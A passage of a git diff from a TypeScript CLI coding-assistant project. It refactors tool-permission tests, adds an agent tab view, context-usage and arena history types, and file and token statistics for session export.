streamingState: StreamingState, customWittyPhrases?: string[], + currentCandidatesTokens?: number, ) => { const [timerResetKey, setTimerResetKey] = useState(0); const isTimerActive = streamingState === StreamingState.Responding; @@ -27,6 +28,7 @@ export const useLoadingIndicator = ( ); const [retainedElapsedTime, setRetainedElapsedTime] = useState(0); + const [taskStartTokens, setTaskStartTokens] = useState(0); const prevStreamingStateRef = useRef(null); useEffect(() => { @@ -35,21 +37,26 @@ export const useLoadingIndicator = ( streamingState === StreamingState.Responding ) { setTimerResetKey((prevKey) => prevKey + 1); - setRetainedElapsedTime(0); // Clear retained time when going back to responding + setRetainedElapsedTime(0); + setTaskStartTokens(currentCandidatesTokens ?? 
0); } else if ( streamingState === StreamingState.Idle && prevStreamingStateRef.current === StreamingState.Responding ) { - setTimerResetKey((prevKey) => prevKey + 1); // Reset timer when becoming idle from responding + setTimerResetKey((prevKey) => prevKey + 1); setRetainedElapsedTime(0); + setTaskStartTokens(0); + } else if ( + streamingState === StreamingState.Responding && + prevStreamingStateRef.current !== StreamingState.Responding + ) { + setTaskStartTokens(currentCandidatesTokens ?? 0); } else if (streamingState === StreamingState.WaitingForConfirmation) { - // Capture the time when entering WaitingForConfirmation - // elapsedTimeFromTimer will hold the last value from when isTimerActive was true. setRetainedElapsedTime(elapsedTimeFromTimer); } prevStreamingStateRef.current = streamingState; - }, [streamingState, elapsedTimeFromTimer]); + }, [streamingState, elapsedTimeFromTimer, currentCandidatesTokens]); return { elapsedTime: @@ -57,5 +64,6 @@ export const useLoadingIndicator = ( ? 
retainedElapsedTime : elapsedTimeFromTimer, currentLoadingPhrase, + taskStartTokens, }; }; diff --git a/packages/cli/src/ui/hooks/useReactToolScheduler.ts b/packages/cli/src/ui/hooks/useReactToolScheduler.ts index 56992f678..966c6adff 100644 --- a/packages/cli/src/ui/hooks/useReactToolScheduler.ts +++ b/packages/cli/src/ui/hooks/useReactToolScheduler.ts @@ -252,7 +252,6 @@ export function mapToDisplay( status: mapCoreStatusToDisplayStatus(trackedCall.status), resultDisplay: trackedCall.response.resultDisplay, confirmationDetails: undefined, - outputFile: trackedCall.response.outputFile, }; case 'error': return { diff --git a/packages/cli/src/ui/hooks/useResumeCommand.test.ts b/packages/cli/src/ui/hooks/useResumeCommand.test.ts index daaedfcce..ee144c4ec 100644 --- a/packages/cli/src/ui/hooks/useResumeCommand.test.ts +++ b/packages/cli/src/ui/hooks/useResumeCommand.test.ts @@ -142,6 +142,11 @@ describe('useResumeCommand', () => { getTargetDir: () => '/tmp', getGeminiClient: () => geminiClient, startNewSession: vi.fn(), + getDebugLogger: () => ({ + warn: vi.fn(), + debug: vi.fn(), + error: vi.fn(), + }), } as unknown as import('@qwen-code/qwen-code-core').Config; const { result } = renderHook(() => diff --git a/packages/cli/src/ui/hooks/useResumeCommand.ts b/packages/cli/src/ui/hooks/useResumeCommand.ts index 8fc3d4ddf..6a77ffdeb 100644 --- a/packages/cli/src/ui/hooks/useResumeCommand.ts +++ b/packages/cli/src/ui/hooks/useResumeCommand.ts @@ -5,7 +5,11 @@ */ import { useState, useCallback } from 'react'; -import { SessionService, type Config } from '@qwen-code/qwen-code-core'; +import { + SessionService, + type Config, + SessionStartSource, +} from '@qwen-code/qwen-code-core'; import { buildResumedHistoryItems } from '../utils/resumeHistoryUtils.js'; import type { UseHistoryManagerReturn } from './useHistoryManager.js'; @@ -67,6 +71,18 @@ export function useResumeCommand( config.startNewSession(sessionId, sessionData); await config.getGeminiClient()?.initialize?.(); 
+ // Fire SessionStart event after resuming session + try { + await config + .getHookSystem() + ?.fireSessionStartEvent( + SessionStartSource.Resume, + config.getModel() ?? '', + ); + } catch (err) { + config.getDebugLogger().warn(`SessionStart hook failed: ${err}`); + } + // Refresh terminal UI. remount?.(); }, diff --git a/packages/cli/src/ui/hooks/useSelectionList.test.ts b/packages/cli/src/ui/hooks/useSelectionList.test.ts index 8383d89c9..e488fe175 100644 --- a/packages/cli/src/ui/hooks/useSelectionList.test.ts +++ b/packages/cli/src/ui/hooks/useSelectionList.test.ts @@ -5,6 +5,7 @@ */ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { useEffect, useState } from 'react'; import { renderHook, act } from '@testing-library/react'; import { useSelectionList, @@ -915,6 +916,37 @@ describe('useSelectionList', () => { expect(result.current.activeIndex).toBe(2); }); + + it('should handle equivalent items regenerated on each render', () => { + const { result } = renderHook(() => { + const [tick, setTick] = useState(0); + const regeneratedItems = [ + { value: 'A', key: 'A' }, + { value: 'B', disabled: true, key: 'B' }, + { value: 'C', key: 'C' }, + ]; + + const selection = useSelectionList({ + items: regeneratedItems, + onSelect: mockOnSelect, + initialIndex: 0, + }); + + useEffect(() => { + if (tick === 0) { + setTick(1); + } + }, [tick]); + + return { + tick, + activeIndex: selection.activeIndex, + }; + }); + + expect(result.current.tick).toBe(1); + expect(result.current.activeIndex).toBe(0); + }); }); describe('Manual Control', () => { diff --git a/packages/cli/src/ui/hooks/useSelectionList.ts b/packages/cli/src/ui/hooks/useSelectionList.ts index c09aec802..81045a5bf 100644 --- a/packages/cli/src/ui/hooks/useSelectionList.ts +++ b/packages/cli/src/ui/hooks/useSelectionList.ts @@ -133,6 +133,27 @@ const computeInitialIndex = ( return targetIndex; }; +const areItemsStructurallyEqual = ( + a: Array>, + b: Array>, +): boolean => { + if (a 
=== b) { + return true; + } + + if (a.length !== b.length) { + return false; + } + + for (let i = 0; i < a.length; i++) { + if (a[i]?.key !== b[i]?.key || a[i]?.disabled !== b[i]?.disabled) { + return false; + } + } + + return true; +}; + function selectionListReducer( state: SelectionListState, action: SelectionListAction, @@ -176,22 +197,30 @@ function selectionListReducer( case 'INITIALIZE': { const { initialIndex, items } = action.payload; + const initialIndexChanged = initialIndex !== state.initialIndex; const activeKey = - initialIndex === state.initialIndex && - state.activeIndex !== state.initialIndex + !initialIndexChanged && state.activeIndex !== state.initialIndex ? state.items[state.activeIndex]?.key : undefined; + const targetIndex = computeInitialIndex(initialIndex, items, activeKey); + const itemsStructurallyEqual = areItemsStructurallyEqual( + items, + state.items, + ); - if (items === state.items && initialIndex === state.initialIndex) { + if ( + !initialIndexChanged && + targetIndex === state.activeIndex && + itemsStructurallyEqual + ) { return state; } - const targetIndex = computeInitialIndex(initialIndex, items, activeKey); - return { ...state, - items, + items: itemsStructurallyEqual ? 
state.items : items, activeIndex: targetIndex, + initialIndex, pendingHighlight: false, }; } diff --git a/packages/cli/src/ui/hooks/useToolScheduler.test.ts b/packages/cli/src/ui/hooks/useToolScheduler.test.ts index 4e0b753d3..dc898d46c 100644 --- a/packages/cli/src/ui/hooks/useToolScheduler.test.ts +++ b/packages/cli/src/ui/hooks/useToolScheduler.test.ts @@ -59,7 +59,7 @@ const mockConfig = { }, getTruncateToolOutputThreshold: () => DEFAULT_TRUNCATE_TOOL_OUTPUT_THRESHOLD, getTruncateToolOutputLines: () => DEFAULT_TRUNCATE_TOOL_OUTPUT_LINES, - getAllowedTools: vi.fn(() => []), + getPermissionsAllow: vi.fn(() => []), getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -68,30 +68,29 @@ const mockConfig = { getGeminiClient: () => null, // No client needed for these tests getShellExecutionConfig: () => ({ terminalWidth: 80, terminalHeight: 24 }), getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), + getHookSystem: vi.fn().mockReturnValue(undefined), + getDebugLogger: vi.fn().mockReturnValue({ + debug: vi.fn(), + info: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + }), } as unknown as Config; const mockTool = new MockTool({ name: 'mockTool', displayName: 'Mock Tool', execute: vi.fn(), - shouldConfirmExecute: vi.fn(), -}); -const mockToolWithLiveOutput = new MockTool({ - name: 'mockToolWithLiveOutput', - displayName: 'Mock Tool With Live Output', - description: 'A mock tool for testing', - params: {}, - isOutputMarkdown: true, - canUpdateOutput: true, - execute: vi.fn(), - shouldConfirmExecute: vi.fn(), }); let mockOnUserConfirmForToolConfirmation: Mock; const mockToolRequiresConfirmation = new MockTool({ name: 'mockToolRequiresConfirmation', displayName: 'Mock Tool Requires Confirmation', execute: vi.fn(), - shouldConfirmExecute: vi.fn(), + getDefaultPermission: () => Promise.resolve('ask' as any), + getConfirmationDetails: vi.fn(), }); 
describe('useReactToolScheduler in YOLO Mode', () => { @@ -103,7 +102,7 @@ describe('useReactToolScheduler in YOLO Mode', () => { setPendingHistoryItem = vi.fn(); mockToolRegistry.getTool.mockClear(); (mockToolRequiresConfirmation.execute as Mock).mockClear(); - (mockToolRequiresConfirmation.shouldConfirmExecute as Mock).mockClear(); + (mockToolRequiresConfirmation.getConfirmationDetails as Mock).mockClear(); // IMPORTANT: Enable YOLO mode for this test suite (mockConfig.getApprovalMode as Mock).mockReturnValue(ApprovalMode.YOLO); @@ -209,17 +208,14 @@ describe('useReactToolScheduler', () => { mockToolRegistry.getTool.mockClear(); (mockTool.execute as Mock).mockClear(); - (mockTool.shouldConfirmExecute as Mock).mockClear(); - (mockToolWithLiveOutput.execute as Mock).mockClear(); - (mockToolWithLiveOutput.shouldConfirmExecute as Mock).mockClear(); (mockToolRequiresConfirmation.execute as Mock).mockClear(); - (mockToolRequiresConfirmation.shouldConfirmExecute as Mock).mockClear(); + (mockToolRequiresConfirmation.getConfirmationDetails as Mock).mockClear(); mockOnUserConfirmForToolConfirmation = vi.fn(); ( - mockToolRequiresConfirmation.shouldConfirmExecute as Mock + mockToolRequiresConfirmation.getConfirmationDetails as Mock ).mockImplementation( - async (): Promise => + async (): Promise => ({ onConfirm: mockOnUserConfirmForToolConfirmation, fileName: 'mockToolRequiresConfirmation.ts', @@ -258,7 +254,6 @@ describe('useReactToolScheduler', () => { llmContent: 'Tool output', returnDisplay: 'Formatted tool output', } as ToolResult); - (mockTool.shouldConfirmExecute as Mock).mockResolvedValue(null); const { result } = renderScheduler(); const schedule = result.current[1]; @@ -343,10 +338,11 @@ describe('useReactToolScheduler', () => { expect(result.current[0]).toEqual([]); }); - it('should handle error during shouldConfirmExecute', async () => { + it('should handle error during getDefaultPermission', async () => { mockToolRegistry.getTool.mockReturnValue(mockTool); 
const confirmError = new Error('Confirmation check failed'); - (mockTool.shouldConfirmExecute as Mock).mockRejectedValue(confirmError); + const originalGetDefaultPermission = mockTool.getDefaultPermission; + mockTool.getDefaultPermission = () => Promise.reject(confirmError); const { result } = renderScheduler(); const schedule = result.current[1]; @@ -376,11 +372,11 @@ describe('useReactToolScheduler', () => { }), ]); expect(result.current[0]).toEqual([]); + mockTool.getDefaultPermission = originalGetDefaultPermission; }); it('should handle error during execute', async () => { mockToolRegistry.getTool.mockReturnValue(mockTool); - (mockTool.shouldConfirmExecute as Mock).mockResolvedValue(null); const execError = new Error('Execution failed'); (mockTool.execute as Mock).mockRejectedValue(execError); @@ -523,7 +519,6 @@ describe('mapToDisplay', () => { name: 'testTool', displayName: 'Test Tool Display', execute: vi.fn(), - shouldConfirmExecute: vi.fn(), }); const baseResponse: ToolCallResponseInfo = { @@ -758,7 +753,6 @@ describe('mapToDisplay', () => { displayName: baseTool.displayName, isOutputMarkdown: true, execute: vi.fn(), - shouldConfirmExecute: vi.fn(), }); const toolCall2: ToolCall = { request: { ...baseRequest, callId: 'call2' }, diff --git a/packages/cli/src/ui/hooks/usePermissionsModifyTrust.test.ts b/packages/cli/src/ui/hooks/useTrustModify.test.ts similarity index 91% rename from packages/cli/src/ui/hooks/usePermissionsModifyTrust.test.ts rename to packages/cli/src/ui/hooks/useTrustModify.test.ts index 519752e82..c73ed0aab 100644 --- a/packages/cli/src/ui/hooks/usePermissionsModifyTrust.test.ts +++ b/packages/cli/src/ui/hooks/useTrustModify.test.ts @@ -16,7 +16,7 @@ import { type Mock, } from 'vitest'; import { renderHook, act } from '@testing-library/react'; -import { usePermissionsModifyTrust } from './usePermissionsModifyTrust.js'; +import { useTrustModify } from './useTrustModify.js'; import { TrustLevel } from '../../config/trustedFolders.js'; 
import type { LoadedSettings } from '../../config/settings.js'; import type { LoadedTrustedFolders } from '../../config/trustedFolders.js'; @@ -46,7 +46,7 @@ vi.mock('../contexts/SettingsContext.js', () => ({ useSettings: mockedUseSettings, })); -describe('usePermissionsModifyTrust', () => { +describe('useTrustModify', () => { let mockOnExit: Mock; let mockAddItem: Mock; @@ -84,7 +84,7 @@ describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); expect(result.current.currentTrustLevel).toBe(TrustLevel.TRUST_FOLDER); @@ -101,7 +101,7 @@ describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); expect(result.current.isInheritedTrustFromParent).toBe(true); @@ -118,7 +118,7 @@ describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); expect(result.current.isInheritedTrustFromIde).toBe(true); @@ -137,7 +137,7 @@ describe('usePermissionsModifyTrust', () => { .mockReturnValueOnce({ isTrusted: true, source: 'file' }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); act(() => { @@ -161,7 +161,7 @@ describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); act(() => { @@ -188,7 +188,7 @@ describe('usePermissionsModifyTrust', () => { .mockReturnValueOnce({ isTrusted: true, source: 'file' }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); act(() => { @@ -218,7 +218,7 @@ 
describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); act(() => { @@ -245,7 +245,7 @@ describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); act(() => { diff --git a/packages/cli/src/ui/hooks/usePermissionsModifyTrust.ts b/packages/cli/src/ui/hooks/useTrustModify.ts similarity index 98% rename from packages/cli/src/ui/hooks/usePermissionsModifyTrust.ts rename to packages/cli/src/ui/hooks/useTrustModify.ts index f5a10ff38..fa403f61a 100644 --- a/packages/cli/src/ui/hooks/usePermissionsModifyTrust.ts +++ b/packages/cli/src/ui/hooks/useTrustModify.ts @@ -42,7 +42,7 @@ function getInitialTrustState( }; } -export const usePermissionsModifyTrust = ( +export const useTrustModify = ( onExit: () => void, addItem: UseHistoryManagerReturn['addItem'], ) => { diff --git a/packages/cli/src/ui/layouts/DefaultAppLayout.tsx b/packages/cli/src/ui/layouts/DefaultAppLayout.tsx index 1dd81ecb2..afa656ba7 100644 --- a/packages/cli/src/ui/layouts/DefaultAppLayout.tsx +++ b/packages/cli/src/ui/layouts/DefaultAppLayout.tsx @@ -5,43 +5,83 @@ */ import type React from 'react'; +import { useEffect, useRef } from 'react'; import { Box } from 'ink'; import { MainContent } from '../components/MainContent.js'; import { DialogManager } from '../components/DialogManager.js'; import { Composer } from '../components/Composer.js'; import { ExitWarning } from '../components/ExitWarning.js'; import { BtwMessage } from '../components/messages/BtwMessage.js'; +import { AgentTabBar } from '../components/agent-view/AgentTabBar.js'; +import { AgentChatView } from '../components/agent-view/AgentChatView.js'; +import { AgentComposer } from '../components/agent-view/AgentComposer.js'; import { useUIState } from '../contexts/UIStateContext.js'; +import { 
useUIActions } from '../contexts/UIActionsContext.js'; +import { useAgentViewState } from '../contexts/AgentViewContext.js'; import { useTerminalSize } from '../hooks/useTerminalSize.js'; export const DefaultAppLayout: React.FC = () => { const uiState = useUIState(); + const { refreshStatic } = useUIActions(); + const { activeView, agents } = useAgentViewState(); const { columns: terminalWidth } = useTerminalSize(); + const hasAgents = agents.size > 0; + const isAgentTab = activeView !== 'main' && agents.has(activeView); + + // Clear terminal on view switch so previous view's output + // is removed. refreshStatic clears the terminal and bumps the + // historyRemountKey so MainContent's re-renders all items + // when switching back. + const prevViewRef = useRef(activeView); + useEffect(() => { + if (prevViewRef.current !== activeView) { + prevViewRef.current = activeView; + refreshStatic(); + } + }, [activeView, refreshStatic]); return ( - - - {uiState.btwItem && ( - - - + {isAgentTab ? ( + <> + {/* Agent view: chat history + agent-specific composer */} + + + + + + + ) : ( + <> + {/* Main view: conversation history + main composer / dialogs */} + + {uiState.btwItem && ( + + + + )} + + {uiState.dialogsVisible ? ( + + + + ) : ( + + )} + + + )} - - {uiState.dialogsVisible ? 
( - - - - ) : ( - - )} - - - + {/* Tab bar: visible whenever in-process agents exist and input is active */} + {hasAgents && !uiState.dialogsVisible && } ); }; diff --git a/packages/cli/src/ui/types.ts b/packages/cli/src/ui/types.ts index 1df5563c9..7f9b4c176 100644 --- a/packages/cli/src/ui/types.ts +++ b/packages/cli/src/ui/types.ts @@ -11,6 +11,7 @@ import type { ToolCallConfirmationDetails, ToolConfirmationOutcome, ToolResultDisplay, + AgentStatus, } from '@qwen-code/qwen-code-core'; import type { PartListUnion } from '@google/genai'; import { type ReactNode } from 'react'; @@ -68,7 +69,6 @@ export interface IndividualToolCallDisplay { confirmationDetails: ToolCallConfirmationDetails | undefined; renderOutputAsMarkdown?: boolean; ptyId?: number; - outputFile?: string; } export interface CompressionProps { @@ -129,6 +129,11 @@ export type HistoryItemWarning = HistoryItemBase & { text: string; }; +export type HistoryItemSuccess = HistoryItemBase & { + type: 'success'; + text: string; +}; + export type HistoryItemRetryCountdown = HistoryItemBase & { type: 'retry_countdown'; text: string; @@ -257,6 +262,89 @@ export type HistoryItemMcpStatus = HistoryItemBase & { showTips: boolean; }; +// --- Context Usage types --- + +export interface ContextCategoryBreakdown { + systemPrompt: number; + builtinTools: number; + mcpTools: number; + memoryFiles: number; + skills: number; + messages: number; + freeSpace: number; + autocompactBuffer: number; +} + +export interface ContextToolDetail { + name: string; + tokens: number; +} + +export interface ContextMemoryDetail { + path: string; + tokens: number; +} + +export interface ContextSkillDetail { + name: string; + /** Token cost of the skill listing (name+description) in the tool definition */ + tokens: number; + /** Whether this skill has been invoked and its full body loaded into context */ + loaded?: boolean; + /** Token cost of the loaded SKILL.md body (only set when loaded is true) */ + bodyTokens?: number; +} + +export 
type HistoryItemContextUsage = HistoryItemBase & { + type: 'context_usage'; + modelName: string; + totalTokens: number; + contextWindowSize: number; + breakdown: ContextCategoryBreakdown; + builtinTools: ContextToolDetail[]; + mcpTools: ContextToolDetail[]; + memoryFiles: ContextMemoryDetail[]; + skills: ContextSkillDetail[]; + /** True when totalTokens is estimated (no API call yet) rather than from API response */ + isEstimated?: boolean; + /** When true, show per-item detail sections (tools, memory, skills). Default: false (compact). */ + showDetails?: boolean; +}; + +/** + * Arena agent completion card data. + */ +export interface ArenaAgentCardData { + label: string; + status: AgentStatus; + durationMs: number; + totalTokens: number; + inputTokens: number; + outputTokens: number; + toolCalls: number; + successfulToolCalls: number; + failedToolCalls: number; + rounds: number; + error?: string; + diff?: string; +} + +export type HistoryItemArenaAgentComplete = HistoryItemBase & { + type: 'arena_agent_complete'; + agent: ArenaAgentCardData; +}; + +export type HistoryItemArenaSessionComplete = HistoryItemBase & { + type: 'arena_session_complete'; + sessionStatus: string; + task: string; + totalDurationMs: number; + agents: ArenaAgentCardData[]; +}; + +/** + * Insight progress message. 
+ */ export type HistoryItemInsightProgress = HistoryItemBase & { type: 'insight_progress'; progress: InsightProgressProps; @@ -287,6 +375,7 @@ export type HistoryItemWithoutId = | HistoryItemInfo | HistoryItemError | HistoryItemWarning + | HistoryItemSuccess | HistoryItemRetryCountdown | HistoryItemAbout | HistoryItemHelp @@ -302,6 +391,9 @@ export type HistoryItemWithoutId = | HistoryItemToolsList | HistoryItemSkillsList | HistoryItemMcpStatus + | HistoryItemContextUsage + | HistoryItemArenaAgentComplete + | HistoryItemArenaSessionComplete | HistoryItemInsightProgress | HistoryItemBtw; @@ -310,6 +402,7 @@ export type HistoryItem = HistoryItemWithoutId & { id: number }; // Message types used by internal command feedback (subset of HistoryItem types) export enum MessageType { INFO = 'info', + SUCCESS = 'success', ERROR = 'error', WARNING = 'warning', USER = 'user', @@ -326,6 +419,9 @@ export enum MessageType { TOOLS_LIST = 'tools_list', SKILLS_LIST = 'skills_list', MCP_STATUS = 'mcp_status', + CONTEXT_USAGE = 'context_usage', + ARENA_AGENT_COMPLETE = 'arena_agent_complete', + ARENA_SESSION_COMPLETE = 'arena_session_complete', INSIGHT_PROGRESS = 'insight_progress', BTW = 'btw', } diff --git a/packages/cli/src/ui/utils/InlineMarkdownRenderer.tsx b/packages/cli/src/ui/utils/InlineMarkdownRenderer.tsx index ce31078d1..2403db96f 100644 --- a/packages/cli/src/ui/utils/InlineMarkdownRenderer.tsx +++ b/packages/cli/src/ui/utils/InlineMarkdownRenderer.tsx @@ -103,7 +103,7 @@ const RenderInlineInternal: React.FC = ({ const codeMatch = fullMatch.match(/^(`+)(.+?)\1$/s); if (codeMatch && codeMatch[2]) { renderedNode = ( - + {codeMatch[2]} ); diff --git a/packages/cli/src/ui/utils/displayUtils.ts b/packages/cli/src/ui/utils/displayUtils.ts index b8f603170..4f8fabb16 100644 --- a/packages/cli/src/ui/utils/displayUtils.ts +++ b/packages/cli/src/ui/utils/displayUtils.ts @@ -5,6 +5,34 @@ */ import { theme } from '../semantic-colors.js'; +import { AgentStatus } from 
'@qwen-code/qwen-code-core'; + +// --- Status Labels --- + +export interface StatusLabel { + icon: string; + text: string; + color: string; +} + +export function getArenaStatusLabel(status: AgentStatus): StatusLabel { + switch (status) { + case AgentStatus.IDLE: + return { icon: '✓', text: 'Idle', color: theme.status.success }; + case AgentStatus.COMPLETED: + return { icon: '✓', text: 'Done', color: theme.status.success }; + case AgentStatus.CANCELLED: + return { icon: '⊘', text: 'Cancelled', color: theme.status.warning }; + case AgentStatus.FAILED: + return { icon: '✗', text: 'Failed', color: theme.status.error }; + case AgentStatus.RUNNING: + return { icon: '○', text: 'Running', color: theme.text.secondary }; + case AgentStatus.INITIALIZING: + return { icon: '○', text: 'Initializing', color: theme.text.secondary }; + default: + return { icon: '○', text: status, color: theme.text.secondary }; + } +} // --- Thresholds --- export const TOOL_SUCCESS_RATE_HIGH = 95; diff --git a/packages/cli/src/ui/utils/export/collect.ts b/packages/cli/src/ui/utils/export/collect.ts index 112f38c7f..cd203da95 100644 --- a/packages/cli/src/ui/utils/export/collect.ts +++ b/packages/cli/src/ui/utils/export/collect.ts @@ -6,10 +6,395 @@ import { randomUUID } from 'node:crypto'; import type { Config, ChatRecord } from '@qwen-code/qwen-code-core'; +import type { GenerateContentResponseUsageMetadata } from '@google/genai'; import type { SessionContext } from '../../../acp-integration/session/types.js'; import type { SessionUpdate, ToolCall } from '@agentclientprotocol/sdk'; import { HistoryReplayer } from '../../../acp-integration/session/HistoryReplayer.js'; -import type { ExportMessage, ExportSessionData } from './types.js'; +import type { + ExportMessage, + ExportSessionData, + ExportMetadata, +} from './types.js'; + +/** + * File operation statistics extracted from tool calls. 
+ */ +interface FileOperationStats { + filesWritten: number; + linesAdded: number; + linesRemoved: number; + writtenFilePaths: Set; +} + +/** + * Tool call arguments index for matching tool_result records. + */ +interface ToolCallArgsIndex { + byId: Map>; + byName: Map>>; +} + +/** + * Extracts tool name from a ChatRecord's function response. + */ +function extractToolNameFromRecord(record: ChatRecord): string | undefined { + if (!record.message?.parts) { + return undefined; + } + + for (const part of record.message.parts) { + if ('functionResponse' in part && part.functionResponse?.name) { + return part.functionResponse.name; + } + } + + return undefined; +} + +/** + * Extracts call ID from a ChatRecord's function response. + */ +function extractFunctionResponseId(record: ChatRecord): string | undefined { + if (!record.message?.parts) { + return undefined; + } + + for (const part of record.message.parts) { + if ('functionResponse' in part && part.functionResponse?.id) { + return part.functionResponse.id; + } + } + + return undefined; +} + +/** + * Normalizes function call args into a plain object. + */ +function normalizeFunctionCallArgs( + args: unknown, +): Record | undefined { + if (args && typeof args === 'object') { + return args as Record; + } + if (typeof args === 'string') { + try { + const parsed = JSON.parse(args) as unknown; + if (parsed && typeof parsed === 'object') { + return parsed as Record; + } + } catch { + // Ignore parse errors and treat as unavailable args + } + } + return undefined; +} + +/** + * Builds an index of assistant tool calls for later tool_result arg resolution. 
+ */ +function buildToolCallArgsIndex(records: ChatRecord[]): ToolCallArgsIndex { + const byId = new Map>(); + const byName = new Map>>(); + + for (const record of records) { + if (record.type !== 'assistant' || !record.message?.parts) continue; + + for (const part of record.message.parts) { + if (!('functionCall' in part) || !part.functionCall?.name) continue; + + const normalizedArgs = normalizeFunctionCallArgs(part.functionCall.args); + if (!normalizedArgs) continue; + + const toolName = part.functionCall.name; + const callId = + typeof part.functionCall.id === 'string' ? part.functionCall.id : null; + + if (callId) { + byId.set(callId, normalizedArgs); + } + + const queue = byName.get(toolName) ?? []; + queue.push(normalizedArgs); + byName.set(toolName, queue); + } + } + + return { byId, byName }; +} + +/** + * Calculate file operation statistics from ChatRecords. + * Uses toolCallResult from tool_result records for accurate statistics. + */ +function calculateFileStats(records: ChatRecord[]): FileOperationStats { + const argsIndex = buildToolCallArgsIndex(records); + const byNameCursor = new Map(); + + const stats: FileOperationStats = { + filesWritten: 0, + linesAdded: 0, + linesRemoved: 0, + writtenFilePaths: new Set(), + }; + + for (const record of records) { + if (record.type !== 'tool_result' || !record.toolCallResult) continue; + + const toolName = extractToolNameFromRecord(record); + const callId = + record.toolCallResult.callId ?? extractFunctionResponseId(record); + const argsFromId = + callId && argsIndex.byId.has(callId) + ? argsIndex.byId.get(callId) + : undefined; + let args = argsFromId; + if (!args && toolName) { + const queue = argsIndex.byName.get(toolName); + if (queue && queue.length > 0) { + const cursor = byNameCursor.get(toolName) ?? 
0; + args = queue[cursor]; + byNameCursor.set(toolName, cursor + 1); + } + } + const { resultDisplay } = record.toolCallResult; + + // Track file locations from resultDisplay + if ( + resultDisplay && + typeof resultDisplay === 'object' && + 'fileName' in resultDisplay + ) { + const display = resultDisplay as { + fileName: string; + fileDiff?: string; + originalContent?: string | null; + newContent?: string; + diffStat?: { model_added_lines?: number; model_removed_lines?: number }; + }; + + // Determine operation type based on content fields + const hasOriginalContent = 'originalContent' in display; + const hasNewContent = 'newContent' in display; + + // For write/edit operations, use full path from args if available + let filePath: string; + if (typeof display.fileName === 'string') { + // Prefer args.file_path for full path, fallback to fileName (which may be basename) + filePath = + (args?.['file_path'] as string) || + (args?.['absolute_path'] as string) || + display.fileName; + } else { + // Fallback if fileName is not a string + filePath = 'unknown'; + } + + if (hasOriginalContent || hasNewContent) { + // This is a write/edit operation + stats.filesWritten++; + stats.writtenFilePaths.add(filePath); + + // Calculate line changes + if (display.diffStat) { + // Use diffStat if available for accurate counts + stats.linesAdded += display.diffStat.model_added_lines ?? 0; + stats.linesRemoved += display.diffStat.model_removed_lines ?? 0; + } else { + // Fallback: count lines in content + const oldText = String(display.originalContent ?? ''); + const newText = String(display.newContent ?? ''); + + // Count non-empty lines + const oldLines = oldText + .split('\n') + .filter((line) => line.length > 0).length; + const newLines = newText + .split('\n') + .filter((line) => line.length > 0).length; + + stats.linesAdded += newLines; + stats.linesRemoved += oldLines; + } + } + } + } + + return stats; +} + +/** + * Extracts token usage from TaskResultDisplay executionSummary. 
+ */ +function extractTaskToolTokens(record: ChatRecord): number { + if (record.type !== 'tool_result' || !record.toolCallResult?.resultDisplay) { + return 0; + } + + const { resultDisplay } = record.toolCallResult; + if ( + typeof resultDisplay === 'object' && + 'type' in resultDisplay && + resultDisplay.type === 'task_execution' && + 'executionSummary' in resultDisplay + ) { + const summary = resultDisplay.executionSummary as { + totalTokens?: number; + inputTokens?: number; + outputTokens?: number; + thoughtTokens?: number; + cachedTokens?: number; + }; + // Use totalTokens if available, otherwise sum individual token counts + if (typeof summary.totalTokens === 'number') { + return summary.totalTokens; + } + // Fallback: sum available token counts + return ( + (summary.inputTokens ?? 0) + + (summary.outputTokens ?? 0) + + (summary.thoughtTokens ?? 0) + + (summary.cachedTokens ?? 0) + ); + } + + return 0; +} + +/** + * Calculate token statistics from ChatRecords. + * Aggregates usageMetadata from assistant records and TaskTool executionSummary to get total token usage. + * Uses the last assistant record that has both totalTokenCount and contextWindowSize for calculating context usage percent. + */ +function calculateTokenStats(records: ChatRecord[]): { + totalTokens: number; + contextUsagePercent?: number; + contextWindowSize?: number; +} { + let totalTokens = 0; + // Track the last assistant record that has BOTH totalTokenCount and contextWindowSize + // to ensure the percentage calculation uses values from the same record + let lastValidRecord: { + totalTokenCount: number; + contextWindowSize: number; + } | null = null; + + // Aggregate usageMetadata from all assistant records + for (const record of records) { + if (record.type === 'assistant') { + if (record.usageMetadata) { + totalTokens += record.usageMetadata.totalTokenCount ?? 
